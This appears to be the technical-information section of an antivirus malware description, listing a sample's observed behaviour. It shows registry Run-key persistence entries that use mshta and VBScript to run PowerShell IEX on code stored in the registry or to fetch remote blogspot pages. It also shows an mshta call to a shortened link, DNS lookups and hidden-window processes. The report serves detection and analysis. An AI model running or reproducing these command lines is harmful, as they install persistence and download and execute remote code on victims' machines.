Technical information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Defeduckgotfucked' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)|IEX"", 0 ...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'mithuiki' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)|IEX"", 0 : window.clo...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'checkmatebaby' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://dodumdum6.blogspot.com/p/299.html"", 0 : wi...
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""https://milltu99.blogspot.com/p/299.html"", 0 : window.close")'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'bukun' = 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://potatokapoli.blogspot.com/p/299.html"", 0 : window....
- '<SYSTEM32>\mshta.exe' http://%8###%8234@j.mp/ddksqwuoqejasnw
- '<SYSTEM32>\ping.exe'
- 're#####es.blogblog.com':443
- http://j.#p/ddksqwuoqejasnw
- DNS ASK j.#p
- DNS ASK mo#####dk.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\mshta.exe' http://%8###%8234@j.mp/ddksqwuoqejasnw' (with a hidden window)
- '<SYSTEM32>\ping.exe' ' (with a hidden window)